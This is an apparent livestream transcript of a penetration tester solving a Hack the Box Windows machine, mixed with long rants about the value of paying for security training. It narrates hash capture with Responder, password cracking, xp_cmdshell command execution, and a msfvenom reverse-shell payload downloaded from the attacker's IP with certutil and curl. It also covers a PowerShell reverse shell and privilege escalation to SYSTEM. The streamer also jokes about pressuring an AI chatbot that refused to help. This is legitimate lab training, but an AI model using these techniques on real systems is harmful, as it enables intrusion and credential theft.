I want on the platform at will. I can reset at will. I don't have to rely on other people on the box, because when you're on the non-paid versions, there's VIP Plus too, you still have to share a VIP as well. So there's regular, free, there's VIP, and there's VIP Plus. VIP Plus is the only one that gets you your own instances. And like I said, when you're not in your own instance, you have to have a vote to reset the box. And there's times where I want to reset the box right away because I messed something up. And there's also going to be times where, like, if you're on a machine, you know, if someone's on a machine with me, they can mess me up. Or they can kick me out the box. They can mess up my exploits. I just don't want to. They're hard enough as it is. Why do I want to fight with all that other nonsense? You know what I mean? Because they're hard enough by themselves. And sometimes you could be doing the right exploit and it's not working because someone changed a setting on the box that you don't know. You know what I mean? It's absolutely worth it. I mean, if I don't know your financial situation, but $20 a month, man, it's not that much. You know, we got people paying. How much is a Netflix subscription? I don't even know, bro. So we got people paying $25 a month for premium Netflix. How much is a Hulu subscription? And we got people paying $10 a month for Hulu. But then we got people that say, oh, I can't pay $20 for Hack the Box, bro. And Hack the Box is going to help you out in your career. You know, these skill sets that you learn from Hack the Box equate to a 6-figure job. If you can't pay $20 for Hack the Box, then your priorities are not set right, in my opinion. Like I said, I don't know your financial situation, but if you're paying for Netflix and you're paying for Hulu, and you're hesitant on paying for Hack the Box, then your priorities are misaligned, my friend. And I just showed you, I don't subscribe to this stuff. I had to literally Google it because I had no idea what the price is. I never even looked into this. But $20 a month, absolutely worth it. It's a huge return on investment. It's like a gym membership, dude. You know what I mean? Like you pay and you're gonna get I look at it like kind of like a gym membership, man. The rewards are just worth it. Now I don't have a gym membership. I just work out at home, and I run the track outside in my park here. And I don't, and I'm not afraid to run in 10-degree weather. Yes, I've actually done that. I continuously run in below freezing weather on a routine basis because I don't want to pay for a gym membership. Plus, the cold weather makes me tougher, and it's more rewarding when you go out there in 10-degree weather in the snow and ice and you run a mile and a half than it is to go to the gym and run on a treadmill for a mile and a half. I'm on a tangent here. Moral of the story is $20 a month for VIP Plus, 100% worth it. No matter what your skill level is. I mean, the only time I wouldn't do it is if like you're brand new. Like I would do Try Hack Me first. Do your Try Hack Me first, but once you're done with your Try Hack Me stuff and you graduate to Hack the Box, pay for it. Now Hack the Box Academy is different. Hack the Box Academy is very much more expensive than VIP Plus for Hack the Box, but for those who don't know, Hack the Box Academy and Hack the Box are different platforms. By the way, Wire Dog, thanks for stopping in. You came in right when I'm on a tangent here, which happens a lot on this stream. Thanks for sharing the show on LinkedIn. I really appreciate it. I don't know if you can call it a show, the live stream. The show is more slightly organized, at least. This is not organized at all. This is 100% unscripted. Raw, unfiltered, Kyser Clark, twitch.tv/Kyser Clark _cybersecurity or youtube.com/Kyser Clark. I see that. Well, it just makes me mad. Like when people are like, oh, I can't afford $20 for Hack the Box, but I'll pay $8 a month for Hulu. I'll pay $50 to get DoorDash every day. You know what I mean? I'll pay $25 for Netflix Premium and Disney Plus, whatever that is. Well, how much is Disney Plus? Disney Plus cost $10 a month for the basic. I'll pay $60 a year for PlayStation Plus membership. I'll pay, I don't know what Xbox Live costs. What's Xbox Live cost? Xbox Live cost. Oh my gosh. Where's my mouse? My mouse is gone. Maybe my battery died. Did my battery die? Oh man, my battery died. I'll be right back. Alright, I am back. Oh, I was clicking my mouse, putting them back together. Okay. Xbox Live cost. How much does this stuff cost? $10 a month? Wonder what it is a year. I don't even get a quick answer. $120 a year for the privilege of the hobby? They're paying $120 a year plus the games. Bro, there's a reason why I don't know the prices of any of these. I don't subscribe to none of these. And I can afford it. I can afford that stuff. I just don't do it because it's a waste of time. You know, I mean, I'm not saying you can't have fun, but I just drives me bonkers when people are like, "Oh, I can't afford a $200 certification," or yeah, they're more than that, a $500 certification, but I can afford a $500 PlayStation. I can afford a $500 Xbox. I can afford a $1,200 iPhone, but I can't afford a certification that costs $500 that's gonna help me land a 6-figure job. You know what I mean? Jeez, getting me worked up again. And there's nothing wrong with having all that stuff. But when people are like indulging in entertainment too much, you know, they're buying $60 video games every month or every week or whatever it is. And I used to do that, by the way. I used to buy a new video game every week, $60 a pop. Cha-ching, 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 cha-ching. So I did in my early 20s. Once I realized I can take that money and invest in myself, aka my training, life got a whole lot better for me. Sorry, I went on a huge tangent. Cypher just asked me if it was worth, if is Hack the Box worth paying for, and the answer is yes, 100%. Like, without a doubt, worth paying for. It's $20 a month, and you get, if you're going to use it, and if I would say if you're going to use Hack the Box every week, which you should be doing Hack the Box every week if you're going to be a pen tester or an office security professional, or even a defender too, because you got the Sherlocks here. If I was a SOC analyst or a cybersecurity engineer, I would do Sherlocks every week instead of machines every week. These are for the defenders. These machines are for the attackers. So that's why you don't see me doing it to Sherlocks. Maybe one day. They lack discipline. Yeah, I mean, it happens. Like I said, in my early 20s, I was like that. You know, I didn't know better. No one told me like, oh yeah, you can invest. I didn't know you can invest money. Like, I had no idea that was a thing. Like, I didn't know you can invest into the stock market. I didn't know you like retirement accounts were a thing. I didn't know you can invest into training to help you land better jobs. I seriously thought you just applied to positions that were open, and then they just said, yeah, we can use you. Like, that's what I thought life was all about. Like, oh yeah, just go find a job, like applying to random places with no resume or nothing. But once I figured it out, man, I'm like, dude, can you tell me if all I gotta do is sit here and hack stuff or read the book, pass that exam, and people will pay me to do that? Obviously, you gotta enjoy the field, right? But there's a lot of fields where it's like that. Like, for example, in medical field, like if you go get medical certifications and you know you read your medical books and stuff like that, then you're gonna have a fulfilling medical career. Same thing for lawyers. Same thing. If you like law, read your law books. In this case, we're talking about cybersecurity. What's up, Sin Blonderina? Thanks for stopping in. Glad to see you here. And Vincent, thanks for stopping in. I saw your guys' comments. I just wasn't finished ranting. Well, I'm done ranting now. I don't even know what I was doing. You got me distracted. What was I doing? Oh, I'm trying to authenticate to this. Why can't I? I thought that's what I'm trying to figure out here. Why does this work? Where's it at? See, look. See if you guys can zoom in. So he logged in. This is the write-up, by the way. This is like supposed to be the answer. mssql.py reporting at IP address - Windows auth. Oh, I see what I'm doing differently. He's applying the password after the fact. I'm trying to supply the password right now. What if I just did this? Let's get rid of the password. So it's reporting at this, and then we'll supply the password. That's what I'm doing wrong. SQL's like that, dude. There we go. There we go. You're raging on people who had Disney Plus. And there's nothing wrong with having Disney Plus. I'm just saying, the point I'm trying to make is like, if you're subscribed to all this stuff and you're complaining about the way your life is, then that's where the problem is. Now, if you have the self-discipline to like still get your work done and you are financially stable and like a $9 a month isn't like really setting you behind, then by all means go for it. But what I'm trying to say is like, there's so many people that consume my content. I'm like, oh, I can't afford the cert, I can't afford the training. And I get it, it's not cheap, but these are the same type of people. Like you're not broke, and the reason why I know you're not broke is because you're commenting from a tablet or an iPhone or a computer. You have internet connection somewhere. I mean, you might be on if you're on a public Wi-Fi and you're at like a public library using internet, that's a different story. But I would say more times than not, most people I know, even the poorest of poor people that I know, like they still blow money on stupid stuff. And that's why they're poor, actually. And like I said, I used to be in that, bro. I used to be broke, really broke, because I spent all my money on video games. Isn't it worth time wasting time on those people? Right, yeah. Yeah, like I spent $5,000 on offsec training for offsec unlimited. And dude, that was a huge financial commitment right there. That took me several months of nothing but saving up for that. I mean, I'm talking like a quarter year, dude. I saved up for a quarter year. I didn't splurge on nothing. It took me a quarter year to save that up. I put every spare dollar I had into it to get that offsec training for $5,000, and it was worth every single penny. It was worth it. All those sacrifices I made, like, oh nah, don't eat out, don't buy a PlayStation game, don't subscribe to Netflix, all this stuff, don't get a car payment. That's another thing. People will be spending $800 on a car that for no reason. I paid for pretty much all my certs. I paid for a lot of mine. I mean, I definitely got a lot of mine paid for from the Air Force when I was in, and my current employer is actually funding a lot of my education nowadays. But I've still paid the price for a lot of my certs, especially the most expensive one I have, which is the offsec ones. Paid for those myself, and those are the most expensive ones I have. And it's worth it. Oh yeah, we gotta figure out how to let's use responder again. We need to authenticate to myself. I'm gonna pull over ChatGPT. We already had the answer here. Well, I don't know if it's an answer, but it's a potential answer. ChatGPT, it's most likely going to get it wrong, but it's worth a shot. we need to do. Where's that responder command? Forget. It's like -W or something. Dash. Here we go. -WV. -WV. Alright, we're listening for events. Cool. And then we need to do exec. Your IP and share. So I should be able to just copy this, paste this, put my IP address here, 10.10.16.29. Did that work? Let's go back to responder. Oh yeah, boy, we got a freaking hash, boy. Gosh, that's so satisfying. What's up, Ymir? Thanks for stopping in. Glad to see you here. Have I tried Pentest GPT? I have when it first came out. Honestly, I thought Pentest GPT was pretty bad, and I gave up on it. It might be better now, but when it first came out, I thought it was pretty garbage, to be honest with you. So our user is Querier. So let's just so juiced. This is me when I hack stuff and I get a hash from responder. Everyone, why do you keep constantly paying for your certifications? I'm paying and taking certifications because it's keeping my skills sharp, and I will see them in future years. Yeah, exactly. It's just an investment in yourself. It's a better investment than any stock market trade you can make. You know, I always tell people, it's like, you get OSCP, right? People are like, oh, the price is too high. It's like, dude, you get the money back after 2 paychecks at your pen testing job. Within a half a month. And when I say 2 paychecks, I mean like weekly paychecks. If you get paid bi-weekly, then you're gonna get paid. You're gonna make the money back in like 1 check. If you get a 6-figure job, which you should have a 6-figure job if you are a full-time pen tester. If you're not, then you're underpaid, and I would seriously reconsider your salary. But yeah, man, you get your OCP, you pay $1,700 for it. You make the money back very quickly. And even if you are, like for me, a pen tester, it's like, well, you know, if I spend a few $100s on a cert here, a few $100s on a cert there, it's like I'm going to be able to ask for a pretty significant raise because I proven competency to, you know, make it to the next level, you know, get harder certifications and stuff like that. But I haven't been paying for my training actually, so I just do the time. Right now I'm investing my time into the training because the money is, I pay for it and then they reimburse me for whatever training I want for the most part. I mean, obviously you got to keep it within reason, right? And I have a track record of actually passing the certifications, right? If you have a track record of not passing the certification, then your employers can be like, dude, what the heck? We need to crack this hash. I don't know why. I'm just sitting here ranting again. I got so excited for the hash that I didn't even try to crack it yet. Nano hash.txt. Let's just do John. I know John's slower than Hashcat, but it should just work. There we go. Corporate 568, dude. Woo! We got a password, boy. All right, now we can log in. Evil WinRM, maybe. Oh, I think I already have Evil WinRM tab up. Maybe not this one. Let's go ahead and close this tab. Bro, where's that Evil WinRM? Dude, I don't feel like typing it in again. Alright, well, I guess I don't know it. Alright. Evil WinRM. What is the syntax for that? There we go. Sorry, I'm looking at my notes by the monitor. I just have notes filled with just random command syntax, and it's not exactly the best organized. Alright, so I just need to paste the password here. I need to pass the IP address here. See, this is why I was looking for the command, because I had to fill all this information out. Again, I should have just been an up arrow key. Okay, go back to the thing. Get my IP address, paste that here. The user is Querier and password is corporate. Hopefully this just lets me log in. Oh no. The username is mfsql.service. That's it. That's not the right. Courier is the machine name. I thought that Courier was a user and the machine name. For a second. Mr. Diesel Doug, thanks for subscribing on the YouTube channel. Welcome to the channel. Does Hack the Box have anything good for Blue Team? Yeah, I was actually just talking about this. So, this is Hack the Box, the main platform, not the Academy. This is the main platform. Academy and the main platform, two separate platforms. They used to have separate logins. Now you can use the same login for each, which is nice that they changed that. But here's the main platform. As you can see, we have these things called Sherlocks right here. So these Sherlocks are for defenders. Engage in thrilling investigative challenges that test your defensive security skills. With Sherlocks, you'll be tasked to dive into the aftermath of a targeted cyber attack and unravel the dynamics behind them based on the knowledge provided. Ready to start the investigation. So that's why they're called Sherlocks. You're doing cyber incident investigations. And I haven't done any of these, but I'll tell you what, if I was a defender, I'd be all over this. And if I was a defender, this is what I would be streaming right now. The machines are for your offense security professionals. Your Sherlocks are for your defense security professionals. Hack the Box Academy also has defender modules as well, and they even have a defender blue team certification too. So there's plenty to do for defenders on this platform. Will I try Sherlocks? Is that what you're asking? Not anytime soon, because I'm still focused on increasing my red team skills, but maybe one day. I mean, I definitely want to start dabbling in some of that blue team stuff, but there's just so much red team content, offense security content, that it's just, I haven't had the desire to go into the blue team stuff yet. I mean, I have done blue team stuff, obviously. I like all the fundamentals, and I have a CYSA Plus. That's a cybersecurity analyst certification, so it's not like I have no blue team experience, and I worked in cyber defense operations for 6 years in the United States Air Force. I just never worked as a SOC analyst or a cybersecurity analyst. What was I doing? Oh yeah, we're trying to log in. Where is the user? Is not Querier. The user is MS. That should get me on the machine. Maybe. Bro, if this isn't working, I don't know how to get on this machine. Bro, how? How do I get on this? That's the username and password. Unless this is the user. No, that's not the user. This has got to be the user right here. No. Username right here. It's Querier /. Maybe if I just did the full thing. I tried Querier by itself. I tried MSSQL by itself. Let's try both of them together. Let's see if that works. I doubt it. Where's my... There it is. How do I log in the box? I don't know how else to log into this box. I just see WinRM and that's it. I mean, we got Microsoft RPC open. We can probably try to get more users, but let's... We can dump usernames with RPC if we have a username, so let's just try that. This is an old box that we did earlier. So we got a hazard. So let's do the username. And then let's do the password. And then the IP address. And see if we can dump other usernames via RPC. This should work. Should give us some usernames here. It is. Okay. So we got MSSQL service, which is one we already knew. Reporting, we already knew that as well. Oh, you know what? We had Lewis as a user too. Let's just try that. It didn't pop up in that last... It didn't pop up here, but we did see that in the files and the shares. So, see if that does anything. Well, let's see if we can try some like Kerberoasting or something. Let's try that. Let's see if we can get some Kerberoasing going on here. Definitely worth trying here. That's not what I wanted. I did not want to paste the username there. I wanted to pay. No, I want to send an email with the IP address. Copy selection. TCP is there. Password is go up here. Corporate. I bet you we can. There's all kinds of Active Directory. We can try password spraying. User is MSSQL service. I'll try Kerberoasting here. It's definitely worth a shot. Domain name is Querier. Let's see if that works. Connection refused. What's up, Cyber World? SK, thanks for stopping. Glad to see you here. Have I ever tried bug bounty? No. Okay, let's try. Let's try secretdumps.py. See if this gives us anything. You know what I need to start doing is actually making it search, being able to script these, you know? It'd be a lot faster. What's my password? Corporate. Put password here. And the domain and user. Whoop. Copy that. RPC access is denied. Alright then. Pass a hash. Crack map exact. Does crack map exact only work when you have the hash? What if I have a plain text password? Let's see if I can just log in with the password. Maybe it doesn't take a password. Hash P is not an argument. Just had lowercase p. Oh, that worked. I can log in with SMB server that way, but maybe. Oops. That's not what I wanted the username. See if I can just log into the admin share with this. I think it's admin C money if I'm not mistaken. Oops, I gotta give it the right IP address. Maybe I can get back on the admin share, on the SMB share, you know? Password for this is corporate, so back over here. I don't know why I'm stuck so bad right now. This works. I can authenticate through SMB. Wish I knew which tab I was working on. Where'd it go? Huh. Bad network name. Got my syntax all eject. Oh, it's just admin $. That's what I was messing up. Come back over here. We want to get a particular share. So in order to do that, we had to do this. Just so we can get on the admin share. For those who don't know, the reports share, we had an authentication of that. And we've already got our information out of there that we needed. I'm kind of stuck. Let's go back to guided mode. It's running as the MS SQL service. We figured that out. What is the user's password? We got the password.
Access granted.
Cypher is now a YouTube subscriber. Thanks for subscribing, Cypher. Is the MS SQL service a server admin on a queries? Is it? Is it an admin on the MS SQL instance? Yes or no? Oh, I didn't think about going back to this. I don't understand how I can never. Here we go. Never find where I was. Oh, that's the password. I want. I'm just gonna put the password right here on my terminal so I can just copy and paste that. So it's saying, is server role member admin? So I would run this command. 1, that means true, so the answer here is yes. So can I do like select or show databases? That's a MS SQL. Not MS SQL, it's a MySQL command. Show databases. See if that works. I don't know the commands for MS SQL off the top of my head. ChatGPT this. How do I list out the databases and tables in MS SQL? So we can just select name from sys databases. So master example output, master temp db model, literally the exact same thing. So use my database go. Use volume go. How do I list the tables? Name. What if I do select? Oh. Select. Oh my gosh. Select everything from name. Oh, this is frustrating. Why do there have to be so many different versions of SQL, and they have all different syntax? MySQL is so much easier to navigate, in my opinion. We can do this. Select name. Select table name. That's such a complicated syntax. Select name. Well, I don't know. This syntax is so frustrating. How do I... use master. What if I use the syntax drives me nuts. Oh gosh. There's a lot of tables in here. What's the username and password? Use model. Nothing in model. Temp DB. Use temp DB. The table's here. Oh gosh. Where's the username? I don't see anything like a users table. I'm just gonna feed this information to ChatGPT. See if it can just tell me where username and passwords might be. There we go. We got some hashes here, but Looks kind of gross, but we'll fix it. Actually, it doesn't look gross when you paste it into like an actual text document here. Let's see if I can crack any of these from hashes.com. Try this one maybe. HLQTRY. This has been a hard box to get on, I ain't gonna lie. This has been pretty difficult. I haven't even got the user flag yet. I don't know. I need another hint. Sent the flag. Well, is it a server admin? Oh, you know what? I might be able to just do XP command shell. That's what it is. That's what it is. That's what it is. I can just do an XP command shell. Ah, that's what it is. I'm sitting here trying to look for a hash from I could just do an XP command shell. Actually, I think I have notes in this somewhere, actually. Yeah, this is what it is. I got to do XP command shell. Just gotta enable it here. This is some notes I've had from some training. Do a simple test here. Who am I? Querier MSSQL. Nice. So that works. So now all we gotta do is just hit up arrow key and we can just like I can do MSF Venom. Oh, it's been a minute since I've done. I don't want to typo it. Let me grab the syntax for this. MSF Venom -P Windows. Let's assume it's an x64. meter interpreter. Is it reverse? No, reverse TCP. L host equals 10, 10, 16.29. L port equals 443. And dash format, we'll give it an exe -o shell.exe. Python 3-m http.server 80. Alright, now that we got that, we're good here. I don't need these nmaps results anymore. I don't need these anymore. I do need this one. I don't need this anymore. And I don't need this anymore. Okay, so what I need to do is so for those who don't know, I'm hosting this, I made a reverse shell payload. This is a reverse shell malware that I have created with MSFL. Very basic. And then I'm serving it on this HTTP server so I can download it. And the way I want to download it is through the XV command shell on the MSSQL server, because we can run commands. And the command I'm going to run is going to be assert util-url cache-f http ://10.10.16.29/shell.exe, and we're going to call it shell.exe. There occurred. Can I do who am I? I can do who am I. Can I list as a directory? See if that works. But I can't do a cert util. Didn't let me do a cert util. Well, what if I did PowerShell? Let's try to do PowerShell. So here's my command. I just need to replace this with my information. So in this case, it's going to be 10.10.16.29. Actually, before we do that, let's just go ahead and make directory c:/temp. SQL Server block access to procedure. Assist XP command shell component XP command shell because this component is turned off as part of security configuration. So I can't make a directory, but I can say who am I? Oh, they turned it off. How did they turn it off? Is there Windows Defender or something? There we go. Where did that command go? It was, there it is. Make directory. There we go. Now what we're going to do is we're going to do http:// my piece slash what's shell.exe, and we're going to put this in temp shell.exe. I'm going to copy this. See if this just works. Oh! Why can't I figure out? This might work. I'm at 16:29 and shell.exe. Did that work? No, it doesn't seem like it worked. But it would be nice if I put this on one line, though. That's probably why it didn't work. I got command execution here, but I can't download a file. Incorrect syntax near what? Near the slash? How? What if I have to add an extra one of these? Is curl on the box? It says try curl help for more information, so it seems like curl's on the box, so that's cool. We can use curl to transfer the file. So it's going to be curl-o shell.exe http:// 10.10.16.29 / shell.exe. This should work. Failed writing body. How? Permission denied, bro. Ah, it worked. The command worked, but I don't have permissions to run that command, I guess. Let's try this. Let's do a shell. Let's put it in c:/tools. No, I called this temp. Ooh, I think that worked. Okay, I think that worked. Let's go ahead and split this terminal. MSF console-q. It looks like it worked. It just gave me a permission not denied because I didn't have the permission to write in the directory, so that's why I had to put it in the temp directory that I made earlier. So that's good. Okay, now we can do use multi hammer, and we're going to set L port 443, set L host tunnel 0, and set payload to Windows x64 interpreter reverse TCP, and we're going to run that. And if I just run this, hopefully we just get a shell. It's not working. Oh, there's nothing in. Can I change directory? We're going to turn XP command shell back on. It turns off randomly. Maybe not randomly, but it turns off after a while. Which is really annoying. The system cannot find the path specified? Really? Oh, because there's no shell.exe, that's why. Change directory to temp. Okay, let's see if I can do a print working directory. It should be in temp. Print working directory. This entire time I'm stuck on a machine trying to get user. Got everything right, but won't for the life of me get bash. What machine are you on? Cause I'm in the same boat, man. I can't get user either. Are you on the same machine as me? I'm trying to figure out. I'm trying to figure out how to start executing this payload, or at least transfer it over. It already exists. Backfire? I don't think I've done that one. Is Netcat on the box? That'd be really nice if it is. It's downloading, but where's it storing the file? The system cannot execute the specified program. Big rip. Yeah, man. I'm stuck too, bro. It's part of the game. Well, I don't know what else to try either. I think I just gotta find a way to transfer this file over. Did you try guided mode yet? Not yet. What do you? Well, I guess the better question is: do you find that the exploit you just haven't? You can't figure out why it's not working? Because that's my problem. I know I have the vulnerability here. I know I can run commands here, but I can't run my reverse shell. That's the problem. Let's see if wget is on the machine. Maybe that would help us out. Oh gosh. I'm gonna ask ChatGPT this question. See if that works. And then shell.exe's there, dude. I've transferred the file. Shell.exe. It worked. But I can't execute now. I was asking Perplexity AI and help me before. It's like, yeah, I can't help you anymore. I was like, but it's for a hacked blockchain. It's legal. Bro was like, nope, can't do it. What a loser. Perplexity AI is the type of person that snitch on you. No brownies for Perplexity AI. Or cookies. Or ice cream. Or candy. Or chicken noodle soup. Nothing. Definitely no sprinkles. Absolutely not. Did that work? I think I broke it. Just by saying start. And I'm not getting a reverse shell here. This is frustrating. I'm so close. I got the file transferred. I just need to execute it now. I am so close. If I can just figure out what triggered the exploit. My shell's not there no more. There, now my shell's there. It's not recognized as a thing. What do you mean, bro? It's there. Oh my gosh. I cannot get this to work. I hate XP command shell. Deleted my shell. Let's try to just do a PowerShell. reverse shell. Suspicious site blocked. Bro, why is my ISP blocking this? It's blocking it from my on my VM, but it's not blocking it on my host machine. That's so weird. Well, here's rev shells. We don't need an interpreter shell. Let's just take a regular. Let's just URL encode this. No, not URL. Base 64. 16. I'm at 1629. Let's copy this. It doesn't have to be an interpreter shell. I thought maybe an interpreter shell would help me out, but we'll do netcat -ln vp 443. I think PowerShell. I probably did that wrong. Syntax error. Let's try to base 64 encode that, maybe? Yeah, let's try this. I feel like this will work. I gotta nail it. Okay, we're getting there. I think I'm on the right track here. I'm very close. What's up, Ty? Thanks for stopping. Glad to see you here. Yeah, I'm still alive. No. Oh, I don't. It's blocked by my. This script contains malicious content was blocked by your antivirus software. Maybe that's why it's not nothing's working, because the antivirus is killing me. I'm just gonna go to the write up, see what they're doing for this. Throwing in the towel. It's using the Shanks PowerShell or reverse shell. I don't understand. Oh. I have to do some finagling here. Bro, I'm doing the same thing as him and I'm getting blocked by the antivirus, bro. How am I supposed to do this when I'm getting blocked by the antivirus? I'm doing the same thing. I did the same thing as him. This is the worst. Okay. See if I can find another write-up that talks about antivirus bypass or something. I don't know. I'm not the best antivirus bypass person in the world. Bro, everyone's just running any command they want. I don't get that. I'm reverting my machine. No wonder why none of my stuff's working. That's so frustrating, dude. While this is spawning back up, I'm gonna get another drink. Okay, I am back. Thank you for being patient. Yeah, everyone's just running it all willy-nilly, like, it's kind of crazy to me. That, everyone can just run every command that they want, and I'm like sitting here struggling. I'm like, dude, they're running the most basic commands. I feel like my antivirus is supposed to do that. Wonder if I can just run XP command shell without disabling it. Maybe that's what I'm doing wrong. What if we tried? Let's see if we can just run it without. Maybe it's already enabled. Yeah, it's not. We gotta enable it. What command do they use to enable it? Oh, you literally just have an enable XP command shell? I'm overcomplicating this. I always do. There we go. Bro, why? Why am I not allowed to run this command? The guy. Oh, it's because oh, 29. That's why. Typed the wrong IP address. Wrong IP address. No, that worked. Oh, finally got a shell. Oh my gosh. I bet you I gotta... Oh, I am gonna get a user flag here. Finally, I got a user flag, dude. We can finally prove Esc. This flag rating, dude, definitely a bit hard. I'm gonna give it. I'll just put it there. Still medium rating, but all right. Let's see if we can upgrade this to a interpreter shell. So we can do a cert util -url cache -f http :/10.10.16.29 /shell.exe access is denied. Lame. So if we can try to do a curl. Commands. Set the payload to Windows x64. Interpreter reverse TCP. Set L host to tunnel 0. Set L port to 443. And we will clear and run. We take this command and we need to change this from temp to tools. Success. So if I do a dir show.exe should be there. So if I do dot / show.exe, can I execute the program? Okay. This is a headache. Running out of time. I need to just go back to guided mode. I don't have time to enumerate, man. What's the full path of group policy preference? Power up PS1 will find this. Let's do I don't have power up PS1 on here. Oh my god. I need to add invoke all checks on the bottom of this file and then save it. Let's power up PS1. Okay, so we can do dot / power up dot PS1. And I got nothing. Bro, what the heck? I can't run nothing. How did you run it? How did he know to go into there? That's what I don't understand. We got a C password. I want to know how he found the C password though without using power up. He just went to program data, Microsoft group policy, history. It just seems too much to remember. Alright, Vincent, see you later, man. Sorry, it took me 5 minutes before I even realized you messaged that. I'm sorry. I think I wouldn't work because I wasn't in a PowerShell. There we go. I have an SC impersonate privilege. Look, there's a password right there. It already cracked it for me. It's an administrator password. That's easy. Power up really did though. Just give it to me. That's sick. Okay, we'll take that. I thought it was gonna be harder to find in this output. I thought it was gonna have to be like, oh, here's the C password. It didn't even give me the C password. It's just like, here's the plain text password. So can I use... see if I can just log in as an administrator here. No such word in the event. What do you mean? No such word in the event. Oh, that's why. Because the exclamation point's throwing it off. I have to put this in double quotes. No, you need to do. Okay, hold on. You have to do quotes. Paste this in here, and then you have to put in some slashes. This is a hard password to put in here. What if I just leave this blank? You know, no, it doesn't. Let's not specify a password. Okay, here we go. This makes it easier. We just put the password in like that. Even when RM is letting me down. psexec.py. psexec.py worked for him. psexec.py. What's the command? Bro, nothing ever works for me. Oh, because I didn't give. Oh, that's right. I gotta give it an IP address here. That's why. That's why. If I give this an IP address, that should work. There we go. Who am I? I am in the authority system. Nice. Got the root flag, finally. Root flag is pretty easy, to be honest with you. The initial access on this took up all the time. I'd say this was easy for the root flag. Alright guys, it's going to be the end of the stream. Thank you so much for watching. Thanks for hanging out. If you haven't yet subscribed, hit the subscribe button. Hit the like button if you're watching the past broadcast. Or if you're live right now, hit the like button. What's up? Next big time? Next big thing, I mean? How's it going? Thanks for stopping in. You came in here at the wrong time because I'm just not getting off. Check out my podcast. It's called The Hacker's Cache. New episodes every single Wednesday. Also, check out some of my YouTube videos if you guys are watching over on the Twitch or Kick or LinkedIn. youtube.com/CyberSecurityExpert. And yeah, I hope I see you in some videos. Thank you so much for watching. Thanks for hanging out. Peace out. Take care.